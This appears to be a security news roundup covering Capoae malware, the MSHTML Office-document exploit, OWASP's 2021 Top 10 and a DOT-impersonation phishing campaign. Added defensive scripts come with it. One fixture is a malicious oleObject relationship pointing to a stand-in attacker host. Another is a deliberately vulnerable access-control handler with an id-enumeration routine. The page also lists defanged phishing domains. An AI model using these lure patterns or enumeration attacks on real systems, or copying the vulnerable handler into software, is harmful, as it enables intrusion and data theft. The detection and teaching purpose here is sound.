More stories

  • New Go malware Capoae targets WordPress installs, Linux systems

    A new strain of malware, written in Go, has been spotted in cyberattacks launched against WordPress and Linux systems. 

    On Thursday, Larry Cashdollar, senior security researcher at Akamai, said the malware, dubbed Capoae, is written in the Go programming language (Golang), which is fast becoming a favorite with threat actors because of its cross-platform capabilities, and spreads through known bugs and weak administrative credentials.

    Vulnerabilities exploited by Capoae include CVE-2020-14882, a remote code execution (RCE) flaw in Oracle WebLogic Server, and CVE-2018-20062, an RCE in ThinkPHP. The malware was spotted after a sample targeted an Akamai honeypot. A PHP malware sample arrived through a backdoor linked to a WordPress plugin called Download-monitor, installed after the honeypot’s lax credentials had been obtained through a brute-force attack. This plugin was then used as a conduit to deploy the main Capoae payload, a 3MB UPX-packed binary, to /tmp, where it was unpacked. XMRig is then installed to mine the Monero (XMR) cryptocurrency. Alongside the miner, several web shells are installed, one of which is able to upload files stolen from the compromised system, and a port scanner is bundled with the miner to find open ports for further exploitation.

    “After the Capoae malware is executed, it has a pretty clever means of persistence,” Cashdollar says. “The malware first chooses a legitimate-looking system path from a small list of locations on a disk where you’d likely find system binaries. It then generates a random six-character filename, and uses these two pieces to copy itself into the new location on the disk and deletes itself. Once this is done, it injects/updates a Crontab entry that will trigger the execution of this newly created binary.”

    Capoae attempts to brute-force WordPress installations in order to spread, and may also use CVE-2019-1003029 and CVE-2019-1003030, both RCE flaws in Jenkins; infections have been traced to Linux servers. Cashdollar said the Capoae campaign highlights “just how intent these operators are on getting a foothold on as many machines as possible.” Signs of infection include high system resource use, unexpected or unrecognizable processes, and strange log entries or artifacts such as unknown files and SSH keys.

    “The good news is, the same techniques we recommend for most organizations to keep systems and networks secure still apply here,” Cashdollar commented. “Don’t use weak or default credentials for servers or deployed applications. Ensure you’re keeping those deployed applications up to date with the latest security patches and check in on them from time to time.”

    In a second blog post, Akamai examined the evolution of Kinsing, malware that exploits known vulnerabilities in unpatched systems to operate and spread a cryptocurrency mining botnet. According to researcher Evyatar Saias, Akamai first spotted Kinsing in February, and at first it targeted only Linux. A recent upgrade has allowed the botnet to also strike Windows systems across the Americas, Asia, and Europe.
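
    The persistence routine Cashdollar describes (a copy of the binary under a random six-character name in a directory where system binaries live, triggered from cron) is something a responder can hunt for directly. The script below is an added example written for this page, not Akamai's code: it parses crontab text, unwraps nohup and sh -c wrappers, and flags entries whose executable sits in a system binary directory under a six-character alphanumeric name. The article gives neither the list of directories nor the exact alphabet of the random name, so SYSTEM_BIN_DIRS and RANDOM_NAME are assumptions, and the sample crontab is constructed. It goes one step past the article by handling the /etc/crontab format, which carries a user column, and by accepting the package manager's file inventory as an allow-list.

```python
import re
import shlex
from typing import Iterable, List, Optional

# Directories in which the article says Capoae drops a copy of itself
# ("a small list of locations on a disk where you'd likely find system
# binaries"). The article does not give the list; this one is assumed.
SYSTEM_BIN_DIRS = frozenset({"/usr/bin", "/usr/sbin", "/bin", "/sbin", "/usr/local/bin"})

# "a random six-character filename": assumed to be lowercase alphanumerics.
RANDOM_NAME = re.compile(r"^[a-z0-9]{6}$")

# A schedule is either an @-alias (@reboot, @daily) or five fields.
_SCHEDULE = re.compile(r"^\s*(@\w+|(?:\S+\s+){4}\S+)\s+(.*)$")
_WRAPPERS = {"nohup", "nice", "ionice", "env", "sh", "bash", "-c"}


def parse_cron_line(line: str, has_user_field: bool = False) -> Optional[str]:
    """Return the command part of one crontab line, or None for comments,
    blank lines and VAR=value assignments. Set has_user_field for the
    /etc/crontab format, which has a user column before the command."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#") or re.match(r"^\w+=", stripped):
        return None
    m = _SCHEDULE.match(stripped)
    if not m:
        return None
    cmd = m.group(2)
    if has_user_field:
        parts = cmd.split(None, 1)
        cmd = parts[1] if len(parts) == 2 else ""
    return cmd


def first_executable(cmd: str) -> str:
    """Strip common wrappers (nohup, sh -c '...') and return the program path."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:            # unbalanced quotes: fall back to a naive split
        tokens = cmd.split()
    while tokens and tokens[0] in _WRAPPERS:
        tokens.pop(0)
    if tokens and " " in tokens[0]:  # sh -c 'prog args' collapses to one token
        tokens = tokens[0].split()
    return tokens[0] if tokens else ""


def looks_like_dropped_copy(path: str, known_files: Iterable[str] = ()) -> bool:
    """True if path is a six-character random name inside a system binary
    directory and is not on the caller's allow-list (for example the files
    owned by installed packages, from dpkg -S or rpm -qf)."""
    directory, _, name = path.rpartition("/")
    return (directory in SYSTEM_BIN_DIRS
            and bool(RANDOM_NAME.match(name))
            and path not in set(known_files))


def suspicious_cron_entries(crontab_text: str, has_user_field: bool = False,
                            known_files: Iterable[str] = ()) -> List[str]:
    """Return the commands of crontab entries whose executable matches the
    persistence pattern described in the article."""
    known = set(known_files)
    hits = []
    for line in crontab_text.splitlines():
        cmd = parse_cron_line(line, has_user_field)
        if cmd and looks_like_dropped_copy(first_executable(cmd), known):
            hits.append(cmd)
    return hits


# Constructed sample crontab (not a real capture). Two entries are planted in
# the style the article describes; the rest are ordinary.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow command
*/5 * * * * /usr/local/bin/backup.sh --quiet
* * * * * /usr/bin/xkq92z
@reboot nohup sh -c '/usr/sbin/a7f3kd >/dev/null 2>&1'
0 3 * * * /usr/bin/python3 /opt/app/report.py
30 2 * * * /usr/bin/rsync -a /srv /backup
"""

if __name__ == "__main__":
    for entry in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("suspicious:", entry)
```

    Feed it the output of crontab -l -u <user> for each account, and /etc/crontab or the files under /etc/cron.d with has_user_field=True. A hit is a lead, not a verdict: check the flagged path against the package manager and look at its hash and timestamp before acting.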

  • Ransomware attackers targeted app developers with malicious Office docs, says Microsoft

    Microsoft has detailed how it recently saw attackers exploiting a dangerous remote code execution vulnerability in MSHTML, also known as Trident, the rendering engine of Internet Explorer, through rigged Office documents aimed at developers. Microsoft security researchers discovered the flaw being actively exploited on Windows systems in August, and this week’s Patch Tuesday update included a patch for the previously unpatched bug, tracked as CVE-2021-40444.

    The attacks were not widespread, and the vulnerability was used as part of an early-stage attack that distributed custom Cobalt Strike Beacon loaders. Cobalt Strike is a commercial penetration testing tool whose Beacon implant is widely abused by criminals. Rather than the work of state-sponsored hackers, Microsoft found the loaders communicated with infrastructure that it links to several cybercriminal campaigns, including human-operated ransomware. The social-engineering lure used in some of the attacks suggested an element of deliberate targeting, Microsoft said: “The campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted.” At least one organization that was successfully compromised by this campaign had previously been compromised by a wave of similarly themed malware, Microsoft said. In a later wave of activity, however, the lure changed from targeting application developers to a “small claims court” legal threat.

    The attackers used the IE rendering-engine flaw to load a malicious ActiveX control via an Office document. Even after gaining access to affected devices, the attackers still relied on stealing credentials and moving laterally to affect the entire organization. Microsoft recommends that customers apply Tuesday’s patch to fully mitigate the vulnerability, but also recommends hardening the network, cleaning up key credentials, and taking steps to mitigate lateral movement.

    Microsoft considers this attack to be the work of an emerging or “developing” threat actor and tracks the use of the Cobalt Strike infrastructure as DEV-0365, which appears to be run by a single operator. Microsoft believes that follow-on activity from the same infrastructure has, for example, delivered the Conti ransomware, and suggests it could be command-and-control infrastructure sold as a service to other cybercriminals. “Some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads — activity that overlaps with a group Microsoft tracks as DEV-0193. DEV-0193 activities overlap with actions tracked by Mandiant as UNC1878,” Microsoft notes. The BazaLoader malware has been used by malicious call-center operations that use social engineering to get targets to phone an operator, who then talks the victim into installing the malware themselves. Because the initial emails carry no malicious links, they slip past common email-filtering rules.
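
    The chain Microsoft describes, an Office document that pulls an ActiveX control through MSHTML with the oleObjects hosted on attacker infrastructure, leaves a trace inside the document itself: an OOXML relationship whose target is external rather than a part stored in the package. The scanner below is an added example written for this page, not Microsoft's tooling or detection logic. It opens a .docx (a zip file), walks every .rels part, and reports relationships with TargetMode="External", treating an external oleObject, or any mhtml: target, as hostile. The article does not mention the mhtml: scheme; public samples of this exploit used it, which is why the check is included. Both packages are constructed in memory, and attacker.invalid is a placeholder host, not a real indicator.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import List, NamedTuple, Tuple

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
_REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


class ExternalRef(NamedTuple):
    rels_part: str   # which .rels part declared it, e.g. word/_rels/document.xml.rels
    rel_type: str    # last path segment of the relationship Type (oleObject, hyperlink, ...)
    target: str
    hostile: bool
    reason: str


def _classify(rel_type: str, target: str) -> Tuple[bool, str]:
    scheme = target.split(":", 1)[0].lower() if ":" in target else ""
    if rel_type == "oleObject":
        return True, "OLE object is fetched from outside the document"
    if scheme == "mhtml":
        return True, "mhtml: target is handed to the MSHTML engine"
    if rel_type == "hyperlink":
        return False, "ordinary external hyperlink"
    return False, f"external {rel_type or 'relationship'}"


def external_refs(package: bytes) -> List[ExternalRef]:
    """Open an OOXML package (.docx, .xlsx and .pptx are all zip files) and
    return every relationship whose TargetMode is External, classified."""
    found: List[ExternalRef] = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue  # internal parts (styles, images) live inside the zip
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                hostile, reason = _classify(rel_type, target)
                found.append(ExternalRef(name, rel_type, target, hostile, reason))
    return found


def hostile_refs(package: bytes) -> List[ExternalRef]:
    return [r for r in external_refs(package) if r.hostile]


def build_sample_docx(document_rels: str) -> bytes:
    """Constructed minimal package for the example: only the parts the scanner
    looks at. Not a real document and not a malicious sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{_REL_BASE}styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{_REL_BASE}hyperlink" Target="https://example.com/" TargetMode="External"/>
</Relationships>"""

# Shape of the lure: an oleObject relationship whose target is a remote
# document reached through mhtml:. The host is a placeholder.
SUSPECT_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{_REL_BASE}styles" Target="styles.xml"/>
  <Relationship Id="rId5" Type="{_REL_BASE}oleObject" Target="mhtml:http://attacker.invalid/lure.html" TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("suspect", SUSPECT_RELS)):
        for ref in external_refs(build_sample_docx(rels)):
            flag = "HOSTILE" if ref.hostile else "info"
            print(f"{label}: [{flag}] {ref.rels_part} {ref.rel_type} -> {ref.target} ({ref.reason})")
```

    Run it over mail attachments at the gateway or over a quarantine folder; an external oleObject has no place in a normal business document, whatever the target host, so the hostile verdict does not depend on a blocklist of attacker domains.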

  • Health apps 'playing fast and loose' with user data, warns FTC chief

    The Federal Trade Commission (FTC) has warned that health apps and devices that collect or use personal health information must comply with rules requiring them to notify consumers if their health data is leaked. “Digital apps are routinely caught playing fast and loose with user data, leaving users’ sensitive health information susceptible to hacks and breaches,” said FTC chair Lina Khan.


    She pointed to a study warning of problems with health apps ranging from insecure transmission of user data, including geolocation, to unauthorized dissemination of data to advertisers and other third parties in violation of the apps’ own privacy policies. “While users have been adopting health apps at a rapid rate, the commercial owners of these apps too often fail to invest in adequate privacy and data security, leaving users exposed,” Khan said. The Commission said that health apps, which track everything from glucose levels to heart health to fertility and sleep, collect sensitive personal data; consequently, that data must be secured and unauthorized access prevented. The FTC’s Health Breach Notification Rule requires vendors of personal health records and related entities to notify consumers, the FTC, and, in some cases, the media when that data is disclosed or acquired without the consumers’ authorization.

    “In practical terms, this means that entities covered by the rule who have experienced breaches cannot conceal this fact from those who have entrusted them with sensitive health information,” the FTC said. Under the rule, a ‘breach’ is not defined only by a cyberattack; unauthorized access, including sharing of covered information without an individual’s permission, also triggers notification obligations. “As many Americans turn to apps and other technologies to track diseases, diagnoses, treatment, medications, fitness, fertility, sleep, mental health, diet, and other vital areas, this Rule is more important than ever. Firms offering these services should take appropriate care to secure and protect consumer data,” the FTC said.

    Although the Health Breach Notification Rule has been in place for over a decade, it has never been enforced, and the FTC worries that, with the rise of health apps and other connected devices, there are still too few privacy protections in place. The Commission said it “intends to bring actions to enforce the rule,” with violations carrying civil penalties of $43,792 per violation per day.

    The breach notification rule provides some accountability for tech firms that abuse personal information, but a more fundamental problem is the commodification of sensitive health information, with companies using this data to feed behavioral ads or power user analytics, Khan said. “Given the growing prevalence of surveillance-based advertising, the Commission should be scrutinizing what data is being collected in the first place and whether particular types of business models create incentives that necessarily place users at risk,” she said. The FTC said a health app is covered by the rule if it collects health information from a consumer and has the technical capacity to draw information through an API that enables syncing with a consumer’s fitness tracker.

  • Australia, UK, and US form trilateral pact focused on security in Indo-Pacific

    Australia, the UK, and the US are setting up a trilateral partnership aimed at addressing defence and security concerns in the Indo-Pacific region. The security partnership, called AUKUS, will look to promote deeper information and technology sharing between the three governments, with Australian Prime Minister Scott Morrison saying the new partnership would enhance existing networks such as ANZUS, the Quad, and the Five Eyes alliance. “We will foster deeper integration of security and defense-related science, technology, industrial bases, and supply chains. And in particular, we will significantly deepen cooperation on a range of security and defense capabilities,” the governments said in a joint statement. While the three countries did not mention China by name, the initiative appears to be a response to China’s expansionist drive in the South China Sea and its increasing belligerence towards Taiwan. “Our world is becoming more complex, especially here in our region, the Indo-Pacific,” Morrison said on Thursday morning, alongside the leaders of the UK and US. Speaking from Washington DC, US President Joe Biden said the three countries needed to address “the current strategic environment in the region and how it may evolve”. “The future of each of our nations and indeed the world, depends on a free and open Indo-Pacific enduring and flourishing in the decades ahead,” Biden added.

    The first initiative AUKUS will embark on is helping Australia acquire nuclear-powered submarines. Morrison said the three countries would spend the next 18 months drawing up a joint plan to assemble the new Australian nuclear-powered submarine fleet, which will be built in Adelaide. UK Prime Minister Boris Johnson, meanwhile, said the project would be “one of the most complex and technically demanding projects in the world, lasting decades and requiring the most advanced technology”. In announcing the initiative, the governments jointly said the submarines are not an attempt to acquire nuclear weapons or establish a civil nuclear capability, and that the countries would continue to meet their nuclear non-proliferation obligations. Along with the submarines, AUKUS will also look to create initiatives that increase cyber capabilities, artificial intelligence, quantum technologies, and additional undersea capabilities, the governments said.

    The new trilateral partnership follows the three governments, along with the North Atlantic Treaty Organization (NATO) and other nations, accusing China in July of being the actor responsible for the Microsoft Exchange Server hack earlier this year. Last year, Australia did almost everything but name China as the actor responsible for cyber attacks that targeted all levels of government in Australia, as well as the private sector. “Australia doesn’t judge lightly in public attributions, and when and if we choose to do so, it is always done in the context of what we believe to be in our strategic national interest,” Morrison said at the time.

  • OWASP updates top 10 vulnerability ranking for first time since 2017

    Nonprofit foundation Open Web Application Security Project (OWASP) has released an updated draft of its ranking of the top 10 web application security risks, the first change to the list since November 2017.

    The new list features considerable changes, including Broken Access Control moving from fifth place to number 1. The organization said 94% of applications were tested for some form of broken access control and that “the 34 CWEs mapped to Broken Access Control had more occurrences in applications than any other category.” Cryptographic Failures, previously known as Sensitive Data Exposure, moved up one position to number 2; the renamed category focuses on the cryptographic failures that often lead to sensitive data exposure or system compromise. Injection moved down to the third spot, but OWASP noted that 94% of the applications were tested for some form of injection, a category that now includes cross-site scripting. A new category, Insecure Design, made its way into fourth place, followed by Security Misconfiguration, which moved up one spot compared to the 2017 list. Security Misconfiguration now includes XML external entities, and the list’s authors said its rise was not surprising given that 90% of applications were tested for some form of misconfiguration and that there has been a shift toward highly configurable software. Vulnerable and Outdated Components was ranked number 9 in 2017 but moved up to number 6 for this year’s ranking. “It is the only category not to have any CVEs mapped to the included CWEs, so a default exploit and impact weights of 5.0 are factored into their scores,” the list’s authors noted.

    Identification and Authentication Failures, previously called Broken Authentication, fell significantly from number 2 to 7, with OWASP explaining that the increased availability of standardized frameworks has helped address it. Software and Data Integrity Failures is an entirely new category for 2021 and focuses on assumptions made about software updates, critical data, and CI/CD pipelines without verifying integrity. “One of the highest weighted impacts from CVE/CVSS data mapped to the 10 CWEs in this category. Insecure Deserialization from 2017 is now a part of this larger category,” OWASP said. Security Logging and Monitoring Failures was previously last on the list but moved up one spot and has expanded to include other types of failures; while these are challenging to test for, they can “directly impact visibility, incident alerting, and forensics.” Last on the list is Server-Side Request Forgery, which has a “relatively low” incidence rate but was ranked highly in the industry survey.

    OWASP said that overall there were three new categories and four others with name or scope changes for the 2021 list. OWASP, which has put the list together for more than a decade, compiles it from contributed data and industry surveys. “We do this for a fundamental reason, looking at the contributed data is looking into the past. AppSec researchers take time to find new vulnerabilities and new ways to test for them. It takes time to integrate these tests into tools and processes,” OWASP said. “By the time we can reliably test a weakness at scale, years have likely passed. To balance that view, we use an industry survey to ask people on the front lines what they see as essential weaknesses that the data may not show yet.”

    Jayant Shukla, CTO of K2 Cyber Security, told ZDNet that instead of old risks going away, OWASP has consolidated existing risks into several categories and added new ones, reflecting the increased threats facing web applications. Shukla noted that one reason Server-Side Request Forgery attacks and authentication issues are becoming more severe is the rapid increase in the use of microservices in building applications. “These new risk categories emphasize the need to shift left and improve pre-production testing. Unfortunately, these problems are often hard to find during testing, and sometimes they arise and are only a problem when different application modules interact, making them even harder to detect,” Shukla said. “In fact, the National Institute of Standards and Technology has recognized these shortcomings, and last year updated their SP800-53 application security framework to include Runtime Application Self-Protection and Interactive Application Security Testing to better protect against these critical software weaknesses. It’s time the software development industry got on board and adopted these more effective technologies.”
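
    The category now at the top of the list, Broken Access Control, is easiest to understand in code. The following is an added example written for this page, not OWASP material: a small in-memory invoice service (constructed data, made-up users and roles) with the vulnerable handler, which returns whatever record id the client names, next to the hardened one, which denies by default, decides on the server's own record of ownership rather than anything the client sent, and returns the same error whether a record is missing or merely belongs to someone else. A decorator adds function-level control for a support-only operation, and enumerate_invoices plays the attacker walking the id space, which is why this class of bug scores so highly in incidence.

```python
from dataclasses import dataclass
from functools import wraps
from typing import Callable, Dict, List, Optional


@dataclass(frozen=True)
class User:
    user_id: int
    role: str  # "customer" or "support" (assumed role names)


@dataclass(frozen=True)
class Invoice:
    invoice_id: int
    owner_id: int
    amount_cents: int
    voided: bool = False


class AccessDenied(Exception):
    """Raised for both 'no such record' and 'not yours', so the caller
    learns nothing about which ids exist."""


# Constructed in-memory store standing in for a database table.
INVOICES: Dict[int, Invoice] = {
    1001: Invoice(1001, owner_id=1, amount_cents=12900),
    1002: Invoice(1002, owner_id=2, amount_cents=4500),
    1003: Invoice(1003, owner_id=2, amount_cents=99000),
}

ALICE = User(user_id=1, role="customer")
BOB = User(user_id=2, role="customer")
AGENT = User(user_id=9, role="support")


# Vulnerable: the handler knows who the requester is (authentication) but
# never asks whether that person may see this record (authorization).
def get_invoice_vulnerable(requester: User, invoice_id: int) -> Optional[Invoice]:
    return INVOICES.get(invoice_id)


# Hardened: deny by default, decide on server-side ownership.
def _may_view(requester: User, invoice: Invoice) -> bool:
    # Derived from the relationship the server holds between the
    # authenticated principal and the record, never from client input.
    return requester.role == "support" or invoice.owner_id == requester.user_id


def get_invoice_hardened(requester: User, invoice_id: int) -> Invoice:
    invoice = INVOICES.get(invoice_id)
    if invoice is None or not _may_view(requester, invoice):
        # One 404-style error for both cases: no existence oracle.
        raise AccessDenied(f"invoice {invoice_id} not found")
    return invoice


# Function-level access control: enforce the role inside the handler,
# not by hiding the button in the UI.
def require_role(*roles: str) -> Callable:
    def decorator(fn: Callable) -> Callable:
        @wraps(fn)
        def wrapper(requester: User, *args, **kwargs):
            if requester.role not in roles:
                raise AccessDenied(f"{fn.__name__} requires role in {roles}")
            return fn(requester, *args, **kwargs)
        return wrapper
    return decorator


@require_role("support")
def void_invoice(requester: User, invoice_id: int) -> Invoice:
    invoice = get_invoice_hardened(requester, invoice_id)  # support may view all
    updated = Invoice(invoice.invoice_id, invoice.owner_id, invoice.amount_cents, voided=True)
    INVOICES[invoice_id] = updated
    return updated


def enumerate_invoices(handler: Callable, requester: User, ids: range) -> List[int]:
    """What an attacker does against an IDOR: walk the id space and keep
    every record the handler hands back. Returns the ids that leaked."""
    leaked = []
    for invoice_id in ids:
        try:
            invoice = handler(requester, invoice_id)
        except AccessDenied:
            continue
        if invoice is not None:
            leaked.append(invoice.invoice_id)
    return leaked


def denied(fn: Callable, *args) -> bool:
    """True if the call is refused with AccessDenied."""
    try:
        fn(*args)
    except AccessDenied:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", enumerate_invoices(get_invoice_vulnerable, ALICE, range(1000, 1010)))
    print("hardened:  ", enumerate_invoices(get_invoice_hardened, ALICE, range(1000, 1010)))
```

    The test to write for every handler that takes an id is the one enumerate_invoices performs: authenticate as an ordinary user and confirm that ids belonging to other tenants come back as not found, not as data and not as a distinguishable "forbidden".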

  • Dell announces new features for EMC PowerScale and other security updates

    Dell unveiled a slate of new features for its NAS product EMC PowerScale on Wednesday, saying the tools “provide more flexible consumption, management, protection and security capabilities to eliminate data silos and help you effectively use unstructured data.” In a statement, the company said the PowerScale hybrid nodes (H700 and H7000) provide 75% more performance than comparable nodes, and that the archive nodes (A300 and A3000) are twice as effective as similar products.

    “New PowerScale OneFS and DataIQ software enhancements expand storage management, performance monitoring, auditing and compliance capabilities to simplify file storage at scale. Enhancements to our API-integrated ransomware protection capabilities keep data protected from cyberattacks and now offer cloud deployment options in addition to on-premises,” Dell explained in a release. “Dynamic NAS Protection, available with PowerProtect Data Manager, delivers a simple, modern way to protect NAS systems through enhanced backup for file data enabling up to 3X faster backups and up to 2x faster restores.”

    The H700, H7000, A300 and A3000 represent what Dell called a “refresh” of the Isilon line of products unveiled last year. Dell said the new nodes offer more cores, memory and cache, additional networking options and more compatibility options. Nassos Galiopoulos, CTO at the University of Texas, San Antonio, said Dell EMC PowerScale provides multiple nodes for transferring unstructured data at high speed across the school’s HPC environment and for scaling quickly to support its exponential data growth. “We now handle billions of records, along with big data analytics, AI, and machine learning, with tremendous velocity, variety, and volume,” Galiopoulos said.

    Later this quarter, Dell will also release updates to OneFS that will allow the OS to “deliver writable snapshots, faster upgrades, secure boot, HDFS ACL support, and improved data reduction and small file efficiency.” DataIQ was recently enhanced to make it easier for users handling large-scale clusters; the updates brought UI improvements and the ability to run reports that analyze volumes by timestamp.

    Dell also unveiled new security features designed to help organizations deal with ransomware attacks. The “Cyber Protection and Recovery solution from Superna for PowerScale” was built to help enterprises respond to and recover from ransomware attacks, and now includes the Superna Ransomware Defender tool as well. “With this solution, customers can recover their data from a cybersecurity event leveraging the public cloud. A new Superna AirGap Enterprise provides more advanced automation to the air gap feature,” Dell explained. “Additional new productivity features to Superna’s Search and Recover and Easy Monitor capabilities also further expand PowerScale’s exceptional management and control capabilities. For organizations looking to manage easily, incremental-forever NAS data protection with rapid recovery at the file level, today we announced Dynamic NAS Protection, a simple, modern way to protect your NAS systems.” USC Australia infrastructure analyst Drew Hills noted that his organization has multiple policies using a variety of backup methods to protect files on its NAS and Windows file clusters. “With PowerProtect Data Manager, Dynamic NAS Protection automatically slices shares, filesystems and volumes into multiple streams that run in parallel within the same policy,” Hills added. “It also automatically balances and scales across resources, simplifying management while accelerating backups faster than ever before.”

  • Brand abuse attacks dominate list of fraud trends: report

    A new report from Outseer has found that cybercriminals are increasingly turning to brand abuse as the basis for their attacks. The Outseer FraudAction team compiled the report from the 49,000 attacks it tracked throughout Q2 2021. Armen Najarian, Outseer’s chief identity officer, told ZDNet that nearly half of those cases involved cybercriminals spoofing digital content and experiences, such as a fake social media profile, a rogue mobile app or a spoofed website. “Bad actors impersonate credible brands this way to harvest consumer log-in credentials or personal data. As brands continue to accelerate their own digital transformation and as consumer data becomes more valuable, we predict brand abuse attacks will continue to increase,” Najarian said. Outseer said that for the third quarter in a row, brand abuse was the most common attack vector detected. Outseer also found that the US remains the top hosting country for phishing attacks, a position it has held since 2017: ISPs in the US hosted more than 72% of these attacks, according to the report. Outseer attributed the trend to the handful of large-scale “hosting authorities,” whose sheer size makes it easier for fraudulent activity to go undetected.

    People and companies in the US are also the second-largest target for phishing attacks, after South Africa, which reached the top of the list because of the 24 million people affected by the Experian data breach there. Najarian noted that app stores are rife with rogue apps designed to steal from unwitting consumers and said the number of such apps appearing in legitimate marketplaces and stores is rising. “These fake apps, many of which pose as banking apps, infect users’ systems with malware if downloaded. We’ve seen 66% more of these rogue apps compared to last quarter, and 140% more compared to this same time last year,” Najarian said. For the third quarter in a row, mobile banking was the dominant channel for attacks: 70% of fraudulent transactions in digital banking originated in mobile channels in Q2. The company also recovered more than 4.5 million unique compromised cards and card previews from online card shops and fraud communication channels during the quarter. “The pandemic will continue to drive even more digital commerce of various flavors conducted from both desktop environments and increasingly from mobile devices. The increase in digital transactions equates to an increase in vulnerability, and fraud actors will continue to seek access to our personal information if fraud prevention solutions, 3-D Secure and risk-based authentication tools, are not implemented,” Najarian said. “It’s more urgent now than ever for businesses to protect their brands, and to protect their customers from these dangerous attacks, particularly as we approach the holiday shopping season.”

  • Phishers impersonate US DOT to target contractors after Senate passed $1 trillion infrastructure bill

    A new phishing campaign has been uncovered targeting companies that may work with the US Department of Transportation (DOT). Security company INKY, which discovered the campaign, found that the phishers are impersonating the DOT in an effort to harvest Microsoft Office 365 credentials, INKY’s Roger Kay wrote in a blog post.


    Kay noted that the phishing emails peaked around August 16-18, soon after the US Senate passed the $1 trillion infrastructure bill on August 10. Dozens of phishing emails impersonated the DOT, with the attackers contacting multiple companies in the engineering, energy and architecture industries and asking them to submit bids for federal contracts. “The basic pitch was, with a trillion dollars of government money flowing through the system, you, dear target, are being invited to bid for some of this bounty,” Kay said. “By creating a new domain, exploiting current events, impersonating a known brand, and launching a credential harvesting operation, the phishers came up with an attack just different enough from known strikes to evade standard detection methods.” Kay explained that the attackers sent their phishing emails from “transportationgov[.]net,” a newly created domain intended to pass for the .gov addresses that government email normally comes from.

    Amazon was the new domain’s registrar, Kay added, and the domain was registered on August 16. “In the initial pitch, recipients were told that USDOT was inviting them to submit a bid for a department project by clicking a big blue button that said, ‘CLICK HERE TO BID.’ Recipients who clicked on the button were led to a site — transportation.gov.bidprocure.secure.akjackpot[.]com — with reassuring-sounding subdomains like ‘transportation,’ ‘gov,’ and ‘secure.’ But the base domain — akjackpot[.]com — was registered in 2019 and hosts what may or may not be an online casino that appears to cater to Malaysians. Either the site was hijacked, or the site owners are themselves the phishers who used it to impersonate the USDOT,” Kay wrote. “Once on akjackpot[.]com, the victim was instructed to ‘Click on the BID button and sign in with your email provider to connect to the network.’ Targets were told to contact ‘mike.reynolds@transportationgov[.]us’ if there were any questions. However, transportationgov[.]us was another newly created domain registered by the phishers.”

    The phishers made their website look legitimate by copying the HTML and CSS from the real USDOT website. They even included a real warning from the government site about making sure that sites are legitimate US government websites. From there, victims were urged to click a red button asking them to bid, which brought up a Microsoft logo above a form meant to harvest Office 365 credentials. If a victim made it that far and actually entered their credentials, they were given a CAPTCHA challenge, which then took them to a fake error message. From there, they were redirected to the real USDOT website, according to Kay.

    “This last move, dumping victims on a real site is an elegant but perhaps unnecessary flourish that phishers often execute as the final step of their sequence. In the con business, this moment is called the ‘blow-off’ and refers to the time after which the perpetrator has obtained what they were after, but before the mark realizes that they’ve been duped,” Kay said. “In the physical world of swindling, the blow-off gives the perpetrator time to get away. This remnant of older con games sometimes turns up as an artefact in the digital world, where the perpetrators were never ‘there’ in the first place.”
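
    Two of the tricks in this campaign are mechanical enough to check automatically: a trusted name placed in the subdomain labels of someone else's domain (transportation.gov.bidprocure.secure.akjackpot[.]com, where only akjackpot.com was actually registered) and a trusted name with its dot removed under another TLD (transportationgov[.]net, transportationgov[.]us). The script below is an added example written for this page, not INKY's code. It accepts URLs, e-mail addresses and bare hostnames as they appear in reports, including defanged with [.], reduces each to its registrable domain and checks it against a trusted-domain set. The public-suffix subset and TRUSTED_DOMAINS are assumptions for the example (a real deployment loads the full Public Suffix List), example.co.uk is a constructed indicator, and the other sample indicators are the ones quoted in the article.

```python
from typing import List, NamedTuple
from urllib.parse import urlsplit

# Stand-in for the Public Suffix List (publicsuffix.org). Assumed subset.
PUBLIC_SUFFIXES = {"com", "net", "org", "gov", "us", "co.uk", "com.my"}

# Domains this organisation legitimately deals with. Assumed for the example.
TRUSTED_DOMAINS = {"transportation.gov"}


class Verdict(NamedTuple):
    host: str
    registrable: str
    suspicious: bool
    reason: str


def refang(text: str) -> str:
    """Accept defanged indicators as they appear in reports."""
    return text.replace("[.]", ".").replace("hxxp", "http").strip()


def extract_host(indicator: str) -> str:
    """URL, e-mail address or bare hostname -> lowercase hostname."""
    indicator = refang(indicator)
    if "://" in indicator:
        return (urlsplit(indicator).hostname or "").lower()
    if "@" in indicator:
        return indicator.rsplit("@", 1)[1].lower()
    return indicator.lower().rstrip("/")


def registrable_domain(host: str) -> str:
    """The label just above the longest matching public suffix, plus that
    suffix, is what was actually registered; everything to its left is a
    subdomain the registrant can name however they like."""
    labels = host.rstrip(".").split(".")
    for i in range(1, len(labels)):
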